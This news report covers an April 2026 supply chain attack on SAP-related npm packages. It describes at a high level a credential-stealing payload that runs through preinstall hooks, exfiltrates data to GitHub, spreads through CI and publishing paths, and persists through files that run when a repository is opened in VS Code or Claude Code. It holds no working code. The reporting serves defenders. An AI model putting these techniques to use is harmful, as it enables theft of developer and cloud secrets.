SAP-related npm packages were compromised in an April 29 supply chain attack that inserted credential-stealing malware into four releases, according to a technical analysis from Aikido Security. The affected packages were mbt, @cap-js/db-service, @cap-js/postgres, and @cap-js/sqlite.
KEY FACTS
- Packages hit [email protected] and three @cap-js packages were affected.
- Release window the suspicious versions were published on April 29, 2026, between 09:55 UTC and 12:14 UTC.
- Malware behavior the poisoned packages added a preinstall hook that downloaded and ran the Bun runtime.
- Data theft the payload was designed to steal developer, GitHub, npm, cloud, and Kubernetes secrets.
The report said the malicious code used setup.mjs as a loader for an execution file that harvested credentials and exfiltrated the data to public GitHub repositories created on the victim’s account. The payload also attempted to spread through GitHub Actions workflows and npm publishing paths.
The incident differed from earlier Shai-Hulud campaigns in several ways. The stolen data was encrypted with AES-256-GCM and RSA-4096, and the payload also added files aimed at triggering execution when an infected repository was opened in VS Code or Claude Code.
Investigators said the compromised @cap-js releases were tied to a breached maintainer account and misuse of npm’s OIDC trusted publishing setup, while the mbt package was suspected to involve a separate token compromise. Maintainers have since released updated package versions to replace the tainted releases.
WHY IT MATTERS
The incident shows how a single poisoned npm package can expose developer credentials and cloud access across software supply chains. It also highlights the risk of build and editor settings being used as persistence paths in development environments.